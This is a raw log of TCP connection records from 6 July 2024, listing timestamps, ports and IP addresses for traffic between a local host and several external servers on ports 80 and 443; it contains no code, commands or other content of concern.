Jul 6, 2024 13:27:21.054779053 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.054817915 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.138993025 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139005899 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139018059 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139056921 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.139090061 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.139095068 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139192104 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139238119 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.139246941 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139259100 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139295101 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.139326096 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139337063 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.139368057 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.140096903 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.140146017 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.140157938 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.140202999 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.140221119 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.140233040 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.140258074 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.140948057 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.140995026 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.141067028 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.141112089 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.141123056 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.141164064 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.141220093 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.141232014 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.141252041 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.141984940 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.142030001 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.142040968 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.142051935 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.142097950 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.144078016 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.144151926 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.144218922 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.229074001 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.229101896 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.229113102 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.229149103 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.229178905 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.229190111 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.229201078 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.229217052 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.229243994 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.229259014 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.235661983 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.293339968 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.298144102 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.298365116 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.298449993 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.298734903 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.298770905 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.298783064 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.298789978 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.298849106 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.298927069 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.303231001 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.311523914 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.311541080 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.311760902 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.311769962 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.312407017 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.312418938 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.312441111 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.312805891 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.312817097 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.802333117 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.802473068 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.804608107 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.804616928 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.804867029 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.846199989 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.850368977 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850387096 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850399017 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850444078 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.850508928 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850527048 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850537062 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850548983 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850549936 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.850560904 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850570917 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.850605011 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.850677967 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850691080 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.850735903 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.855422020 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.855433941 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.855443954 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.855473995 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.864682913 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.912503958 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.937865019 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.937916040 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.937942028 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.938002110 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.938013077 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.938049078 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.938143969 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.938177109 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.938219070 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.938271046 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.938281059 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.938308001 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.939002991 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939049959 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.939084053 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939102888 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939115047 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939146042 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.939173937 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939249992 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.939642906 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939655066 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939666986 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939703941 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.939784050 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939796925 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.939834118 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.942910910 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.942922115 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.942934036 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.942955971 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.942971945 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.943007946 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.943021059 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.943069935 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.970328093 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.970387936 CEST	443	49755	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:21.971509933 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.973690987 CEST	49755	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:21.975009918 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.975074053 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.975083113 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.975135088 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.977101088 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.977103949 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.977456093 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.978799105 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.981028080 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.981040001 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.981105089 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.981127024 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.983072996 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.983138084 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.983144999 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.983388901 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.984693050 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:21.984695911 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.984904051 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:21.986057997 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.020502090 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.025494099 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:22.025537014 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:22.025542021 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:22.025549889 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:22.025590897 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:22.025695086 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:22.025705099 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:22.025713921 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:22.025743961 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:22.025757074 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:22.025799036 CEST	49753	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:22.028542995 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.030527115 CEST	80	49753	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:22.045047045 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.045078039 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.045217991 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.046340942 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.046359062 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.523308992 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.523380041 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.526894093 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.526906013 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.527146101 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.528963089 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.545737028 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.545814037 CEST	443	49756	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.545866966 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.550018072 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.550091982 CEST	443	49754	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.551819086 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.572364092 CEST	49754	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.572509050 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.626745939 CEST	49758	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.626775980 CEST	443	49758	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.626868963 CEST	49758	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.627228975 CEST	49758	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.627240896 CEST	443	49758	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.685676098 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.685719967 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.685748100 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.685782909 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.685800076 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.685813904 CEST	443	49757	172.67.209.71	192.168.2.4
Jul 6, 2024 13:27:22.685863972 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.706202984 CEST	49757	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:27:22.868410110 CEST	49756	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.966877937 CEST	49759	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.966897964 CEST	443	49759	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:22.966963053 CEST	49759	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.967199087 CEST	49759	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:22.967214108 CEST	443	49759	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.251379013 CEST	49760	80	192.168.2.4	75.119.203.100
Jul 6, 2024 13:27:23.256280899 CEST	80	49760	75.119.203.100	192.168.2.4
Jul 6, 2024 13:27:23.256347895 CEST	49760	80	192.168.2.4	75.119.203.100
Jul 6, 2024 13:27:23.256465912 CEST	49760	80	192.168.2.4	75.119.203.100
Jul 6, 2024 13:27:23.261754990 CEST	80	49760	75.119.203.100	192.168.2.4
Jul 6, 2024 13:27:23.285904884 CEST	443	49758	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.287596941 CEST	49758	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:23.287621975 CEST	443	49758	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.625926971 CEST	443	49759	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.627835989 CEST	49759	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:23.627849102 CEST	443	49759	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.842881918 CEST	443	49758	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.842961073 CEST	443	49758	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.843136072 CEST	49758	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:23.844156027 CEST	49758	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:23.861152887 CEST	49761	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:23.861186981 CEST	443	49761	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.861324072 CEST	49761	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:23.861574888 CEST	49761	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:23.861589909 CEST	443	49761	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:23.871161938 CEST	80	49760	75.119.203.100	192.168.2.4
Jul 6, 2024 13:27:23.871429920 CEST	49760	80	192.168.2.4	75.119.203.100
Jul 6, 2024 13:27:23.871467113 CEST	80	49760	75.119.203.100	192.168.2.4
Jul 6, 2024 13:27:23.871687889 CEST	49760	80	192.168.2.4	75.119.203.100
Jul 6, 2024 13:27:23.872006893 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:23.876797915 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:23.876854897 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:23.876923084 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:23.881640911 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.184272051 CEST	443	49759	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:24.184335947 CEST	443	49759	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:24.184406996 CEST	49759	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:24.184847116 CEST	49759	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:24.485016108 CEST	49763	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:24.485047102 CEST	443	49763	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:24.485152006 CEST	49763	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:24.485431910 CEST	49763	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:24.485447884 CEST	443	49763	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:24.518280029 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518296957 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518307924 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518345118 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.518389940 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518400908 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518412113 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518421888 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.518435001 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518448114 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.518567085 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518578053 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518589020 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.518599033 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.518630028 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.527977943 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.528058052 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.528105021 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.531563044 CEST	443	49761	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:24.532968044 CEST	49761	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:24.532984018 CEST	443	49761	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:24.606822014 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.606838942 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.606883049 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.606946945 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.606983900 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.606993914 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607023001 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.607083082 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607093096 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607131004 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.607702971 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607753992 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607763052 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607800007 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.607825041 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.607844114 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607855082 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.607889891 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.608599901 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.608608961 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.608620882 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.608661890 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.608746052 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.608756065 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.608794928 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.609430075 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.609441042 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.609450102 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.609482050 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.609517097 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.609541893 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.609551907 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.609589100 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.611658096 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.674324989 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.696404934 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696435928 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696446896 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696475983 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.696526051 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696537018 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696547985 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696561098 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696569920 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.696604967 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.696763039 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696815968 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.696836948 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696856022 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696867943 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.696903944 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.697011948 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.697021961 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.697032928 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.697043896 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.697052002 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.697092056 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.697809935 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.697820902 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.697832108 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.697880983 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.697909117 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.700386047 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.700404882 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.700416088 CEST	80	49762	192.3.140.185	192.168.2.4
